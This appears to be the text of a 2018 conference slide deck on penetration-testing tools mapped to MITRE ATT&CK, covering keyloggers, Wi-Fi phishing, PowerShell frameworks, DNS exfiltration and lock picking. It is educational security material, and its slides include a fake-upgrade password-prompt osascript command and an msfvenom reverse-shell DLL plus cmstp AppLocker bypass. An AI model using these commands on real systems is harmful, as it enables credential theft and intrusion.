weapons of a pentester - sector · 2019. 2. 11. · in 2018 i stumbled upon something truly...
TRANSCRIPT
PA
GE
1
www.AleksSecurity.com
Aleks Security Cyber Security Inc.www.AleksSecurity.com
2018 Oct
Understanding the virtual & physical tools used by white/black hat hackers
Weapons of a Pentester
PRESENTER: Nick Aleks
PA
GE
2
www.AleksSecurity.com
Disclaimer
This presentation is intended for professional SECTOR attendees and may contain information, content or opinions that could offend overly sensitive persons.
I will showcasing and demoing tools that could be used to breach computers, networks, and security controls.
By no means am I endorsing the illegal use of these tools.
No individuals, equipment or animals were harmed while developing this presentation.
The thoughts and opinions within this presentation are my own. I speak for no one, no one speaks for me.
PA
GE
3
www.AleksSecurity.com
Nick Aleks
Penetration Tester;
From Toronto
DEFCON Toronto – DC416https://www.meetup.com/DEFCON416
dc416.com
@Nick_Aleks
PA
GE
4
www.AleksSecurity.com
The History of this PresentationThe right tool – for the right job
Why have I given this talk for 3 years in a row?
- Sharing my knowledge as a pentester- Meet amazing people in the industry- Showing off some of the cool toys- Tango with the demo gods- Make hackers better
PA
GE
5
www.AleksSecurity.com
2018 Edition of this talk is a special oneIn 2018 I stumbled upon something truly beautiful
However, I have slowly realized that this was more than just typically showing off some cool tools and how they may be used in your next engagement.
Previous talks in the past had little to no structure but now I wanted to completely reorganize my talk to fit the new trend taking our industry by storm.
The first tool I’ll be showing off to you all is….
PA
GE
6
www.AleksSecurity.com
MITREATT&CK
Framework
PA
GE
7
www.AleksSecurity.com
PA
GE
8
www.AleksSecurity.com
What is MITRE ATT&CK?What are we talking about today?
Adversarial Tactics, Techniques & Common Knowledge
A framework that breaks down the complex POST-EXPLOIT cyber-attacks into individual units/blocks
Mapping MITRE benefits- SIEM rules- EDR detections- APT Threat Intelligence- Map to great pentests ☺
https://attack.mitre.org
the matrix goes on…
Tactics
Techniques
PA
GE
9
www.AleksSecurity.com
What is MITRE ATT&CK?What are we talking about today?
Tactics are divided into 11 categories from Initial Access, Persistence, Lateral Movement to Collection and Exfiltration.
Within each of these Tactics we find a great number of Techniques.
https://attack.mitre.orgExample: Persistence Technique
PA
GE
10
www.AleksSecurity.com
Why map tools to the ATT&CK framework?What are we talking about today?
5 Great reasons- Use the right tool for the right job (if your stuck trying to figure out a way to exfiltrated data)- Gain deeper understanding of the tools you already have (stop using your expensive tools for 1 task)- Compare similar tools and improve PoC testing- Fine-tune tools and better emulate APTs- Identify gaps in currently tooling capabilities (stuff the industry needs)
MITRE ATT&CK has literally became my north-star/map on both the Red & the Blue team side of security
Great community of infosec professionals have doing some amazing things with the framework (google it)
I’m working on some amazing non-pentest engagement related projects regarding this framework.
So stay tuned.. ☺
PA
GE
11
www.AleksSecurity.com
What is a tool?What a tool is in regards to this talk
Nicks Definition:
“Something that helps you get the job done and/or teaches you how to get the job done.”
This can include:- Physical Equipment- Frameworks- Software- Mobile Apps- Widget/Plugins- Book/Guides- YouTube Video/Talks- Websites- Commands- Phrase, Email, Speaking Script and Persona & Clothing (social
eng)
PA
GE
12
www.AleksSecurity.com
Lock picking
Not really mapped to MITRE“Initial Access” - Tactic“Physical Security Compromise”
PA
GE
13
www.AleksSecurity.com
The Art of pickingHow does one pick a lock?
A tension wrench (or torque wrench) is used to apply a torque to the cylinder, while a lock pick (or picklock) is used to push individual pins up until they are flush with the shear line.
Raking or scrubbing a pin tumbler lock is usually done before individual pins are pushed up. While applying torque with the tension wrench, a lock pick with a wide tip is placed at the back of the lock and quickly slid outwards with upward pressure so all the pins are pushed up.
PA
GE
14
www.AleksSecurity.com
Snap gunThe automated lock picking gun
The snap gun strikes all of the bottom pins at once with a strong impact, and then withdraws again. The bottom pins transfer their kinetic energy to the top pins and come to a complete stop without penetrating the lock housing.
How does it work?
10-30sec
How long does it take?
https://www.sparrowslockpicks.ca/
PA
GE
15
www.AleksSecurity.com
Lock picking gearA great place to pickup your gear
https://www.sparrowslockpicks.ca/• Dimple Picks• DIY PICKS• New Stuff• Blade Magazine Halo Points• Lock Pick sets Beginner• Lock Pick sets Advanced• Euro Lock Pick Sets• Military Lock Picks• The MONSTRUM• VORAX• Hooks & Rakes lock pick sets• Warded picks and wafer lock picks• Snap Gun• ByPass Drivers• ByPass Tools• Sparrows Jim• Padlock Shims• Practice Locks• Cut Away Locks• UNCUFF LINK cufflink• Handcuff Key• Elevator Key Set• Bump Keys• Lock Busters• Pinning Mat• Pinning Tweezers• Cases• Tension wrenches• Sparrows Lock Pick Reviews• Single Picks
PA
GE
16
www.AleksSecurity.com
Initial AccessDrive-by Compromise Tools
T1189
PA
GE
17
www.AleksSecurity.com
Browser Exploitation Framework - BeEFT1189 Drive-by Compromise
BeEF is short for The Browser Exploitation Framework. - It is a penetration testing tool that focuses on the
web browser.- Simulate web-borne attacks against clients,
including mobile clients, - Client-side attack vectors. Unlike other security
frameworks, - BeEF looks past the hardened network perimeter
and client system, and examines exploitability within the context of the one open door: the web browser.
PA
GE
18
www.AleksSecurity.com
How it works?T1189 Drive-by Compromise
https://beefproject.com/
BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
PA
GE
19
www.AleksSecurity.com
Other Drive-by Compromise/Webapp Hacking ToolsT1189 Honorable mentions tools
Tool Description URL
Python Webserver Simple webserver you can host on an attacker machine that will allow you to host a malicious payload that can be downloaded by the victim
https://docs.python.org/2/library/simplehttpserver.html
Software: XSSER Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
https://xsser.03c8.net/
Software: Burp Suite Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
http://portswigger.net/burp/
Software: DirBuster DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Blog: Side-channel attacking browsers through CSS3 features
With the staggering amount of features that were introduced through HTML5 and CSS3 the attack surface of browsers grew accordingly.
https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/
PA
GE
20
www.AleksSecurity.com
Initial AccessHardware Addition Tools
T1200
I’m in.
PA
GE
21
www.AleksSecurity.com
T1200 Hardware Addition ToolsWhat is this little USB?
Computer accessories, computers or networking hardware may be introduced into a system as a vector to gain execution.
While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access.
Commercial and open source products are leveraged with capabilities such as - Passive networking tapping- Man-in-the-middle- Keystroke injection- Kernel Memory reading- Wireless access to a network- And the list goes on…
PA
GE
22
www.AleksSecurity.com
The LAN TurtleWhat is this little USB?
The LAN turtle is a covert Systems AdministrativeAnd Penetration testing tool.
It is a stealth remote access, network intelligence gathering and man-in-the-middleHoused within a generic “USB Ethernet Adapter Case”, the LAN turtles appearance allows it to blend into many environments
Drop it on a LAN and access it from anywhere via SSH, Meterpreter and Open VPN.
PA
GE
23
www.AleksSecurity.com
The Keygrabber KeyloggerWhat is this little USB device?
Pros- inline hardware-based keystroke recorder- Plugs into computer USB and keyboard USB plugs into it (literally plug-n-
play)- 8GB encrypted memory- Windows/Linux/Mac (No driver)
Cons:- Require physical access to retrieve keystroke contents- Only works best on the back of desktop towns/docking stations- Doesn’t really work on laptops
http://www.keelog.com
PA
GE
24
www.AleksSecurity.com
The AirDrive KeyloggerWifi enabled keystroke streaming keylogger
Pros- Wifi-hotspot/device that is easily connected to by attacking computer- Plugs into computer USB and keyboard USB plugs into it (literally plug-n-
play)- Access data from a web browser- Can send email reports with data- Time stamping- Live-streamingCons:- Only works best on the back of desktop towns/docking stations- Doesn’t really work on laptops
http://www.keelog.com
PA
GE
25
www.AleksSecurity.com
Keylogger Use CasesNot just to extract Passwords
Use Cases- Profile employee/users behavior
- List most visited websites/servers/urls
- Read emails before they are even sent
- Understand business processes and points of contact
- Extract IP/code/configurations/IP address
- Extract chat/IM messages between employees
http://www.keelog.com
PA
GE
26
www.AleksSecurity.com
A great list of hardware addition tools (buy these in bulk)A list of stuff you should buy in bulk, because you will lose some of them during engagements
Tool Description URL
Bash Bunny USB gigabit Ethernet, serial, flash storage and keyboard emulator https://www.hak5.org/shows/hak5-gear
USB Rubber Ducky Keystroke injection tool disguised as a generic flash drive. https://www.hak5.org/shows/hak5-gear
Packet Squirrel Stealthy pocket-sized network man-in-the-middle device https://www.hak5.org/shows/hak5-gear
LAN Turtle USB Ethernet adapter backdoor and man-in-the-middle device https://www.hak5.org/shows/hak5-gear
Keygrabber USB In-line keylogger (keyboard keystroke recorder) http://www.keelog.com/usb-keylogger/
Raspberry Pi 3 Model B+ 64-bit quad-core processor, dual-band wireless LAN, Bluetooth 4.2/BLE, faster Ethernet, and Power-over-Ethernet mini-computer
https://www.raspberrypi.org
Arduino Uno Rev3/Nano
(distraction/covert operations)
Programmable microcontroller board. It has 14 digital input/output pins (of which 6 can be used as PWM outputs), 6 analog inputs
https://store.arduino.cc/usa/arduino-uno-rev3
PA
GE
27
www.AleksSecurity.com
Initial AccessSpear-phishing
Attachment/Link ToolsT1192/T1193
PA
GE
28
www.AleksSecurity.com
Social Engineering Toolkit (SET)T1192/T1193 Spear-phishing attachment/Link
Spear phishing attack vector option built into SET
SET allows you to craft an attack, integrate into a mail provider (GMAIL) and send a malicious payload (PDF) to the victim.
Allows you to create and save your own templates to use for future SE (Social Engineering) attacks
As easy following the SET menu or you can go ahead and create your own FileFormat payload
https://github.com/trustedsec/social-engineer-toolkit
PA
GE
29
www.AleksSecurity.com
Phishing Dark WatersBlue team books help drive red team ideas
When it comes to spear-phishing your targets its great to have examples of known attacks.
Books like Phishing Dark Waters allows you to pick and choose the types of elements within an phishing campaign to include/not include.
There are a massive number of clues/hints employees have been trained to look out for before clicking links/attachments within emails.
Be sure to hold your spear-phishing to a quality assurance test by measuring against commonly known indicators of suspicious email.
Have a team mate or third-party review your spear-phish email before delivering it in order to remove any personal bias, human/logic errors.
PA
GE
30
www.AleksSecurity.com
T1194 - Spearphishing via Service ToolsHow are they different?
• Spearphishing isn’t just about clicking links or download attachments
• Spearphishing via service is a specific variant of spearphishing.
• It employs the use of third party services rather than directly via enterprise email channels.
• All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry.
• Adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.
• These services are more likely to have a less-strict security policy than an enterprise.
• Some of my fav tools combine the elements of social engineering & scripting/tech & hardware tooling
PA
GE
31
www.AleksSecurity.com
T1194 - Spearphising via Wifi - WifiphiserT1194 – Spearphishing via Service Tool
Step 1 Victim becomes deauthenticated from their access point
Victim joins a rogue access point.
Victim is being served a realistic router config-looking page
Githubhttps://github.com/sophron/wifiphisher
Wifiphisher is a security tool that mounts automated phishing attacks against WiFi networks in order to obtain secret passphrases or other credentials. It is a social engineering attack that unlike other methods it does not include any brute forcing.
Step 2
Victim types password
Step 3
Step 4
PA
GE
32
www.AleksSecurity.com
The Requirements – x2 Wireless cardsHow can we start playing with wifiphisher
✓ Kali Linux
✓ Two wireless network cards,
✓ Capable of injection/monitor mode
Needs TP-LINK TL-WN722N
✓ 150 Mbps
✓ 4dBi detachable antenna
✓ $12 on amazon
PA
GE
33
www.AleksSecurity.com
Wifiphisher – How it worksTake a look at wifiphiser
PA
GE
34
www.AleksSecurity.com
Jamming Interface
PA
GE
35
www.AleksSecurity.com
Router firmware upgrade
WPA2 Enterprise - Add a new form input (username)
PA
GE
36
www.AleksSecurity.com
Free Internet!
PA
GE
37
www.AleksSecurity.com
Mac OSX Wireless Networking Connection Spoofing
PA
GE
38
www.AleksSecurity.com
Spearphishing ToolsT1192/T1193 Spearphishing Attachment/Link Tools
Tool Description URL
Social Engineering Toolkit Manual SET User Manual 6.0 By David Kennedy https://github.com/trustedsec/social-engineer-toolkit
Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails
An essential anti-phishing desk reference for anyone with an email address. Phishing Dark Waters addresses the growing and continuing scourge of phishing emails, and provides actionable defensive techniques and tools to help you steer clear of malicious emails.
https://www.amazon.ca/Phishing-Dark-Waters-Offensive-Defensive/dp/1118958470
Spear-Phishing With the Social Engineering Toolkit Tutorial
A tutorial, outlining creating a spear-phishing attack, sending a malicious file through an email using SET
https://www.youtube.com/watch?v=5BY_vYOik_U
Wifiphisher Github Repo Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks.
https://github.com/wifiphisher/wifiphisher
PA
GE
39
www.AleksSecurity.com
ExecutionApplescript
T1155
PA
GE
40
www.AleksSecurity.com
T1155 - ApplescriptExecution on Mac OSX computers via applescript
• macOS and OS X applications send AppleEvent messages to each other for interprocesscommunications (IPC).
• These messages can be easily scripted with AppleScript for local or remote IPC.
• Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts.
• A list of OSA languages installed on a system can be found by using the osalangprogram.
• AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
• Adversaries can use this to interact with
– open SSH connections
– move to remote machines
– present users with fake dialog boxes.
PA
GE
41
www.AleksSecurity.com
T1155 – Applescript ExampleExecution on Mac OSX computers via applescript
A simple applescript open scripting architecture (osa) command that will prompt the user for a password in order to upgrade their current Mac Operating System. Password is returned in plain text to stout.
osascript -e 'display dialog "Required System Upgrade. Please enter passphrase." default answer "" with icon stop buttons {"Continue"} default button "Continue" with hidden answer'
PA
GE
42
www.AleksSecurity.com
Applescript ToolsT1155 Applescript Tools
Tool Description URL
Attack Mac OSX Dan Tentler gave a talk at LayerOne 2016 https://www.youtube.com/watch?v=buvhi77_MI4
Password Prompt A simple applescript that will prompt the user for a password in order to upgrade their current Mac Operating System. Password is returned in plain text to stout.
https://gist.github.com/nicholasaleks/c272c2630791e612eca6bbf013b5bbf4
Learn AppleScript: The Comprehensive Guide to Scripting and Automation on Mac OS X, Edition 3
Learn AppleScript: The Comprehensive Guide to Scripting and Automation on Mac OS X, Edition 3
https://goo.gl/DpaUUa
APPLESCRIPT IN A NUTSHELL: A DESKTOP QUICK REFERENCE
APPLESCRIPT IN A NUTSHELL: A DESKTOP QUICK REFERENCE https://goo.gl/GG5LVD
PA
GE
43
www.AleksSecurity.com
ExecutionCMSTPT1191
PA
GE
44
www.AleksSecurity.com
T1191 CMSTP ToolsLOLBAS – living off the land binaries and scripts
Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.
Trusted built-in Windows binary
- Not only an execution tactic but also- Defence evasion- Persistence
It accepts an installation file (INF) and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with infected INF files to load and execute DLLs and/or COM scriptlets (SCT)
PA
GE
45
www.AleksSecurity.com
T1191 CMSTPLets bypass Applocker! Example by netbiosX (pentestlab.blog)
Good tutorial on using CMSTP to bypass AppLocker:
1. Generate DLLmsfvenom -p windows/x64/meterpreter/reverse_tcpLHOST=10.0.0.2 LPORT=4444 -f dll –o /root/Desktop/pentestlab.dll
2. Generate malicious INF file which references your DLL
3. Execute - cmstp.exe /s cmstp.inf
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/
PA
GE
46
www.AleksSecurity.com
CMSTP ToolsT1191 CMSTP Tools
Tool Description URL
Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 1/2)
Blog article outline how to create a malicious DLL, INF and execute cmstp.exe
https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
AppLocker Bypass – CMSTP Blog article outline how to create a malicious DLL, INF and execute cmstp.exe
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/
CMSTP Microsoft Doc Windows IT Pro Center Documentationcmstp.exe [/nf] [/ni] [/ns] [/s] [/su] [/u] [Drive:][path]ServiceProfileFileName.inf"
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
CMSTP.exe - remote sctexecution video
Nicky Tyrer Jan 30, 2018 CMSTP.exe (Microsoft Connection Manager Profile Installer) can invoke DllInstall from scrobj.dll. Therefore remote COM scriplets can be executed.
https://www.youtube.com/watch?v=gzBBdoKv0OM
PA
GE
47
www.AleksSecurity.com
ExecutionPowershell Tools
T1086
PA
GE
48
www.AleksSecurity.com
T1086 - EmpirePowershell/Python Post-exploitation Framework
• Empire is a post-exploitation framework that includes:• PowerShell2.0 Windows agent, • Python 2.6/2.7 Linux/OS X agent. • The framework is similar to Metasploit however it has a dedicated
focus on Windows targets• Great tool for not only execution but persistence and privilege
escalation techniques• 3 Main components:
– A listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker's computer.
– A stager is a snippet of code that allows malicious code to be run via the agent on the compromised host.
– An agent is a program that maintains a connection between your computer and the compromised host.
– Check out empire and learn more at:https://github.com/EmpireProject/Empire/wiki/Quickstart
PA
GE
49
www.AleksSecurity.com
T1086 - PowerSploitPowershell Tool
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following script categories :
• CodeExecution
• ScriptModification
• Persistence
• AntivirusBypass
• Exfiltration
• Mayhem
• Privesc
• Recon
https://github.com/PowerShellMafia/PowerSploit
PA
GE
50
www.AleksSecurity.com
T1086 – Atomic Red TeamPowershell Based Attacks
A great tool not only for executing powershellattacks but also other MITRE ATT&CK techniques.
Pros:
- Simple one-liner attacks
- Fairly good coverage (not 100%)
- Easy to use
- Good community support/contribution
Cons:
- No built in validation or clean up scripts
PA
GE
51
www.AleksSecurity.com
PowerShell ToolsT1086 Powershell Tools
Tool Description URL
Fileless PowerShell Attack A brief demonstration of Cybereason blocking a filelessPowerShell-based attack
https://www.youtube.com/watch?v=Hc7h-rIyd5A
Windows PowerShell Cookbook The Complete Guide to Scripting Microsoft's Command Shell https://goo.gl/qnYpPb
Byt3bl33d3r Blog(byte bleeder)
Great blog that posts on python scripted tools from byt3l33d3r github repo
https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html
Atomic Red Team T1086 –PowerShell Attacks
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are focused, have few dependencies, and are defined in a structured format that be used by automation frameworks.
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1086/T1086.md
PSAttack A portable console aimed at making pentesting with PowerShell a little easier.
https://github.com/jaredhaight/PSAttack
PA
GE
52
www.AleksSecurity.com
DiscoverySystems Network
Connections DiscoveryT1049
PA
GE
53
www.AleksSecurity.com
T1049 - G-MoNWireless Network Mapping Application
Powerful WarDriving scanner and GSM / CDMA / EVDO / UMTS and LTE Netmonitor and drive test tool with voice notifications.
It scans for all WiFi networks in range & saves the data with GPS coordinates into a file on your sd card.
You can create a kml file for Google Earth. It shows you the encrytion, channel an signal strength. It shows all APs in range in a live map.
https://play.google.com/store/apps/details?id=de.carknue.gmon2&hl=en
PA
GE
54
www.AleksSecurity.com
T1049 - G-MoNWireless Network Mapping Application
PA
GE
55
www.AleksSecurity.com
T1049 - G-MoNWireless Network Mapping Application
PA
GE
56
www.AleksSecurity.com
T1049 - G-MoNWireless Network Mapping Application
PA
GE
57
www.AleksSecurity.com
NooElec NESDR Mini USB RTL-SDRSDR = Software Defined Radio
USB Software Defined Radio. Used to listen to radio frequencies and display their outputs into your computer
What is it?
- ADS-B (automatic dependent surveillance broadcast)- Police & Fire Scanning- Trucking- Car FOB scanning- Garage door scanning- Gate entry scanning- Satellite images - https://www.rtl-sdr.com/rtl-sdr-
tutorial-receiving-noaa-weather-satellite-images/- Personally I feel like this little guy out-performs
devices x10 its cost
Capabilities?
PA
GE
58
www.AleksSecurity.com
GQRXSDR = Software Defined Radio
Supports hardware equipment SDR, HackRF, Airspy, Funcube Dongles, etc
What is it?
- Discover connected radio devices- Process I/Q data from devices- Change frequency gain and apply various corrections- Mono/Stereo demodulators- Record and playback audio/raw baseband- Spectrum analyser mode
Capabilities?
http://gqrx.dk/
PA
GE
59
www.AleksSecurity.com
YARD Stick 1Sub 1GHz RF transmitter & receiver
Yet Another Radio Dongle can transmit and receive digital wireless signals at frequencies below 1 GHz.
What is it?
YARD stick 1 comes with RfCat firmware installed.RfCAT allows you to interactively control the dongle with a python shell
How does it work?
- Half-duplex transmit and receive- Mods: ASK, OOK, GFSK, 2-FSK, 4-FSK, MSK- Data rates up to 500kbps- Full-speed USB 2.0
Capabilities?
PA
GE
60
www.AleksSecurity.com
Some Radio Operated Security ControlsDoors, Gates, Barriers, Cars
PA
GE
61
www.AleksSecurity.com
What I hacked last yearRF Lamp
PA
GE
62
www.AleksSecurity.com
Command & ControlCommonly Used Ports
T1043
PA
GE
63
www.AleksSecurity.com
T1043 - dnscat2Encrypted data Exfiltration and C2
Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.
This tool is designed to create an encrypted Command and Control (C2) channel over the DNS protocol, which is an effective tunnel out of almost every network
C2 and exfiltration over DNS provides a great mechanism to hide your traffic, evade network sensors, and get around network restrictions.
https://github.com/iagox86/dnscat2
PA
GE
64
www.AleksSecurity.com
T1043 - dnscat2 – How does it work?Encrypted data Exfiltration and C2
- Two sides (client & server side)- Client is C based and runs on minimal dependencies- Server is ruby based and requires a few gem
dependencies
- When you run the client you would specify a domain name
- All requests will be sent to local DNS which will be redirected to the authoritative DNS server (which you own)
- If you don’t have the authoritative DNS server you can run direct UDP/53 (which will probably get caught by firewall/network monitoring pretty easily)
- Great for tunneling any data from client to server with no protocol, upload/download files, shells, etc
- Also, its encrypted by default
PA
GE
65
www.AleksSecurity.com
DiscoveryNetwork Service Scanning
T1046
PA
GE
66
www.AleksSecurity.com
Network Service ScanningToolsT1046 Systems Network Connection Discovery Tools
Tool Description URL
Nikto Nikto Package Description Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs
https://www.cirt.net/Nikto2
DirBuster DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Nmap Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing.
http://nmap.org/
PA
GE
67
www.AleksSecurity.com
Questions?
Penetration Tester;
From Toronto
DEFCON Toronto – DC416
dc416.com
Organizer
@Nick_Aleks
Tweet me your feedback!